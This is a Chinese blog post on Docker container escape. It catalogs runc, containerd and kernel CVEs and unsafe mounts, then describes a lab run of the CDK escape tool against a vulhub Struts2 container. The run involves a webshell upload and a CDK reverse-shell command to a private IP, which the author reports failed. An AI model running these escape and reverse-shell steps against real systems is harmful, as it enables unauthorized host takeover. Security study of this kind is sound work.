云安全-云原生基于容器漏洞的逃逸自动化手法(CDK check)
0x00 docker逃逸的方法种类
1、不安全的配置:
容器危险挂载(挂载procfs,Scoket) 特权模式启动的提权(privileged)
2、docker容器自身的漏洞
3、linux系统内核漏洞
这里参考Twiki的云安全博客,下列为逃逸的种类与漏洞
https://wiki.teamssix.com/CloudNative/Docker/docker-escape-vulnerability-summary.html
1、Docker 自身漏洞
cve-2017-1002101
cve-2018-1002100
cve-2018-15664 符号链接替换漏洞
cve-2019-14271 加载不受信任的动态链接库
cve-2019-1002101
cve-2019-11246
cve-2019-11249
cve-2019-11251
cve-2019-16884
cve-2019-5736 runc 逃逸
cve-2020-15257 containerd逃逸
cve-2020-27151
kata-escape-2020
cve-2021-25741
cve-2021-30465
cve-2022-0492
#2、内核漏洞
cve-2016-5195 DirtyCow
cve-2017-1000112
cve-2020-14386
cve-2021-22555
cve-2022-0847 DirtyPipe#3、不安全的配置
privileged-container
mount-docker-sock
mount-host-etc
mount-host-procfs
mount-var-log
cap_dac_read_search-container
cap_sys_admin-container
0x01 runC逃逸&&containerd逃逸
上述的两种逃逸类型为docker的漏洞,分别是
CVE-2019-5736 runC容器逃逸
CVE-2020-15257 containerd逃逸
关于docker,runC的关系
Containerd:从容器编排角度,Containerd 是容器运行时。
RunC:RunC 是容器运行工具,纯从系统角度,Runc才是底层运行时 。
Docker:一般指的是 docker-shim,其也是一种容器运行时。
CVE-2019-5736 runC容器逃逸是基于一下两个条件:
Docker version <= 18.09.2
RunC version <= 1.0-rc6
满足下列的版本时候,可以尝试该docker漏洞逃逸提权,详细的实验过程这里不作赘述,相关的操作网上也有大量的文章,但是实际的环境去逃逸,还是就事论事,会有许多的其他情况发生。
CVE-2020-15257 containerd逃逸需要满足的条件为:
containerd < 1.4.3
containerd < 1.3.9
docker存在的漏洞版本:19.03.6~3-0
0x02 自动化检测工具CDK&&check
上面可以看到逃逸的种类的以及其中的方法很多,但是实际环境中,是时间紧任务重,一步步的尝试逃逸难免有些费事,这里列举两种工具,CDK和check,集成了自动逃逸方法检测,CDK还集成了对应的poc实现一键逃逸,
CDK三种使用场景:
Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。 Exploit: 提供容器逃逸、持久化、横向移动等利用方式。
Tool: 修复渗透过程中常用的linux命令以及与Docker/K8s API交互的命令。
CDK的自动化逃逸中包含了挂载,特权等许多的自动化利用,
通过特权模式启动一台漏洞环境,使用CDK检测并且自动化逃逸:
dvwa环境cdk自动化失败:
拉取st2漏洞环境:
docker run --net=host -it -p 8888:8080 vulhub/struts2:s2-053
获取当前根目录后将木马上传到指定位置,连接格拉斯后上出纳CDK执行命令
执行cdk
逃逸成功
反弹shell:
./cdk_linux_amd64 run shim-pwn reverse 192.168.196.129 1111
反弹失败,暂未找到原因
check工具的检测:
直接上传执行即可,检测可能存在的逃逸提权漏洞
相关文章:
云安全-云原生基于容器漏洞的逃逸自动化手法(CDK check)
0x00 docker逃逸的方法种类 1、不安全的配置: 容器危险挂载(挂载procfs,Scoket) 特权模式启动的提权(privileged) 2、docker容器自身的漏洞 3、linux系统内核漏洞 这里参考Twiki的云安全博客,下…...
精选10款Python可视化工具,请查收
今天我们会介绍一下10个适用于多个学科的Python数据可视化库,其中有名气很大的也有鲜为人知的。 1、matplotlib matplotlib 是Python可视化程序库的泰斗。经过十几年它仍然是Python使用者最常用的画图库。它的设计和在1980年代被设计的商业化程序语言MATLAB非常接近…...
-skew-GroupBy)
大数据(21)-skew-GroupBy
&&大数据学习&& 🔥系列专栏: 👑哲学语录: 承认自己的无知,乃是开启智慧的大门 💖如果觉得博主的文章还不错的话,请点赞👍收藏⭐️留言📝支持一下博主哦ᾑ…...
window压缩包安装mongodb并注册系统服务
下载解压包 https://fastdl.mongodb.org/windows/mongodb-windows-x86_64-5.0.22.zip启动mongod 解压压缩包 至 d:\mongodb目录中,创建目录data、logs。并创建配置文件mongod.conf输入以下配置 dbpath d:\mongodb\data logpath d:\mongodb\logs\mongo.log loga…...
)
【Java每日一题】——第四十五题:综合案例:模拟物流快递系统。(2023.11.1)
🎃个人专栏: 🐬 算法设计与分析:算法设计与分析_IT闫的博客-CSDN博客 🐳Java基础:Java基础_IT闫的博客-CSDN博客 🐋c语言:c语言_IT闫的博客-CSDN博客 🐟MySQL:…...
二十二、Arcpy批量波段组合——结合Landat数据城市建成区提取
一、前言 其实波段组合和GIS中栅格计算有点类似,实质上就是对每个像素点对应的DN值进行数学计算,也就是可以进行运算表达式是三个或多个变量相加、相减……每一个变量对应于一个图像数据,对这三个或多个图像数据求值并输出结果图像。 二、具体操作 1、实验具体目标 将202…...
电脑上数据恢复的详细操作
在日常使用电脑过程中,我们可能会遇到数据丢失的情况。无论是因为误删除、格式化、病毒攻击还是硬件故障,数据恢复都是我们迫切需要解决的问题。本文将介绍电脑数据恢复的详细操作步骤,帮助读者在面临数据丢失时能够迅速地恢复重要文件。 一…...
3.1 linux控制内核打印printk demsg DEBUG
本文主要内容: 1 列出内核打印级别 2 修改内核打印级别 方法1 编译时 方法2 uboot时 方法3 启动后 3 DEBUG宏控制妙用 4 内存中各种打印函数封装 5 测试示例代码 1 打印级别 #define KERN_EMERG "<0>" /* system is unusable */ #define KERN_ALERT …...
关于爬虫API常见的技术问题和解答
随着互联网的快速发展,数据获取变得越来越重要。爬虫API作为一种高效的数据获取手段,被广泛应用于各种场景。然而,在实际使用过程中,我们经常会遇到一些技术问题。本文将详细介绍爬虫API的常见技术问题及相应的解决方案。 一、爬…...
在CentOS上用yum方式安装MySQL8过程记录
此文参考官方文档一步一步记录安装到正常运行全过程 安装环境:centos7 mysql版本:8.0.35 安装过程主要参考下面两边文章: 1.官方文档 https://dev.mysql.com/doc/refman/8.0/en/linux-installation-yum-repo.html 2.linux yum安装mysql8 安…...
CEYEE希亦新品洗地机Pro系列发布, 领跑行业的「水汽混动」技术的旗舰新杰作
CEYEE希亦全新一代洗地机T800 PRO正式上市,采用双滚刷,双倍活水洗拖洗方式,达到拖一遍抵两遍,相对于10倍洁净效果! 这款希亦Pro系列产品不仅刷新了洗地机行业技术水准,满足了用户愈发极致的清洁效能追求&a…...
为什么要安装防静电门禁闸机
安装防静电门禁闸机可以带来以下几个方面的好处: 防止静电干扰:静电是一种非常危险的物理现象,它可以对电子元器件、电路板和其他敏感设备造成损害,甚至导致设备故障和生产中断。防静电门禁闸机可以有效地防止静电的产生和传导&am…...
和{})
[linux] shell中的()和{}
参考:https://www.cnblogs.com/cheer-lingmu/p/16467561.html 参考:shell中各种括号的作用详解()、(())、[]、[[]]、{}(推荐)_linux shell_脚本之家 一、小括号() 1、命令替换:等同于cmd,shell扫描一遍命令行,发现了…...
jdk官网下载(详细步骤)
jdk全部版本下载网址 Java Archive | Oraclehttps://www.oracle.com/java/technologies/downloads/archive/ 下载之前先建立oracle账号(免费创建),不用特意去搜,你点击下载jdk的时候会自动弹出来,自己建立一个账号就能下载了 找到自己要下载…...
10.24 校招 实习 内推 面经
绿*泡*泡: neituijunsir 交流裙 ,内推/实习/校招汇总表格 1、校招 | 吉利控股集团2024届全球校园招聘路特斯科技专场(内推) 校招 | 吉利控股集团2024届全球校园招聘路特斯科技专场(内推) 2、数字IC验证…...
Pico Neo4、Neo3开发手柄的使用交互监听
using System; using System.Collections; using System.Collections.Generic; using UnityEngine; using UnityEngine.XR;public class InputEvent : MonoSingleton<InputEvent> {//*************输入设别**************************InputDevice leftHandController;Inp…...
【k8s】pod详解
一、Pod介绍 1、Pod的基础概念 Pod是kubernetes中最小的资源管理组件,Pod也是最小化运行容器化应用的资源对象,一个pod代表着集群中运行的一个进程。kubernetes中其它大多数组件都是围绕着pod来进行支持和扩展pod功能的。 例如,用于管理po…...
优思学院:质量管理7原则、8大要点
在质量管理的道路上,没有捷径可循。质量管理是一项需要不断积累经验和智慧的长期过程,其中涵盖了七大关键原则,这些原则是组织在质量管理方面取得持续成功的基石。 1. 以顾客为关注焦点 释义: 质量管理的核心在于满足顾客需求&am…...
自动化测试如何解析excel文件?
前言 自动化测试中我们存放数据无非是使用文件或者数据库,那么文件可以是csv,xlsx,xml,甚至是txt文件,通常excel文件往往是我们的首选,无论是编写测试用例还是存放测试数据,excel都是很方便的。…...
职场好物:乐歌M9S升降办公电脑台,告别久坐办公,升职加薪就选它
办公是现代生活不可避免的组成部分,科技的快速发展,给了我们更多新的生活方式,促使我们更加关注自己的身体状况,我们挨过了饭都吃不饱的年代,随着办公人群的不断扩张,不知道你有没有发现身边人或多或少都有…...
深度解析:SillyTavern如何通过五大革新打造终极AI对话体验?
深度解析:SillyTavern如何通过五大革新打造终极AI对话体验? 【免费下载链接】SillyTavern LLM Frontend for Power Users. 项目地址: https://gitcode.com/GitHub_Trending/si/SillyTavern 你是否曾想过,一个AI对话前端能如何超越简单…...
OpenClaw高阶技巧:Qwen3.5-9B模型微调适配专属自动化场景
OpenClaw高阶技巧:Qwen3.5-9B模型微调适配专属自动化场景 1. 为什么需要定制化模型? 去年我在尝试用OpenClaw处理医疗文献时遇到了一个典型问题:当我让AI助手整理PubMed上的最新论文摘要时,它总是把"随机对照试验(RCT)&quo…...
Gitee崛起:国产项目管理平台如何改写中国企业协作规则书
当GitHub因网络波动导致中国开发者集体"失联",当Jira的英文界面让非技术团队成员望而却步,一个不容忽视的事实正在显现:中国企业需要真正懂本土需求的项目管理解决方案。在这个被国际巨头长期主导的领域,Gitee正以一系列…...
MPC路径跟踪控制横纵垂向控制:状态空间方程推导之旅
MPC路径跟踪控制横纵垂向控制状态空间方程推导服务,线性化和离散化 采用线性模型预测控制理论,推导离散状态空间方程。在自动驾驶以及许多运动控制领域,MPC(模型预测控制)就像一位运筹帷幄的智者,精准地规划…...
从电机测试到上位机:一个硬件工程师用LabWindows/CVI搞定周立功USBCAN的踩坑实录
从电机测试到上位机:LabWindows/CVI与USBCAN实战指南 作为一名长期与电机打交道的硬件工程师,我习惯了在示波器和逻辑分析仪的波形中寻找问题,却始终对那个神秘的"上位机"世界充满敬畏。直到某次项目 deadline 前两周,当…...
gitoxide日志系统:Rust实现的Git操作日志分析
gitoxide日志系统:Rust实现的Git操作日志分析 【免费下载链接】gitoxide An idiomatic, lean, fast & safe pure Rust implementation of Git 项目地址: https://gitcode.com/GitHub_Trending/gi/gitoxide 在日常的Git使用中,我们经常需要查看…...
突破性能瓶颈:MuJoCo大规模仿真云服务架构实战指南
突破性能瓶颈:MuJoCo大规模仿真云服务架构实战指南 【免费下载链接】mujoco Multi-Joint dynamics with Contact. A general purpose physics simulator. 项目地址: https://gitcode.com/GitHub_Trending/mu/mujoco MuJoCo(多关节接触动力学&…...
Hunyuan MT模型部署痛点:上下文感知功能配置详解
Hunyuan MT模型部署痛点:上下文感知功能配置详解 1. 引言:为什么需要关注上下文感知配置 当你第一次部署Hunyuan MT翻译模型时,可能会遇到这样的问题:明明模型支持33种语言互译,但在实际使用中却发现翻译结果不够精准…...
ROS小车新手避坑:从雷达型号不匹配到成功用gmapping建出第一张地图
ROS小车避坑实战:从雷达配置到gmapping建图的完整指南 刚接触ROS和SLAM的新手们,当你兴奋地拆开WHEELTEC教育机器人包装,准备大展身手时,是否曾被"Status Warn: no map received"这样的报错浇灭热情?本文将带…...
JMeter阶梯式压测实战:从零到一构建稳健性能评估体系
1. 为什么需要阶梯式压测? 做过性能测试的朋友都知道,直接给系统施加最大压力就像让一个平时不运动的人突然跑马拉松,很容易出问题。我在实际项目中就遇到过这种情况:某次直接给系统施加5000并发请求,结果不仅测试失败…...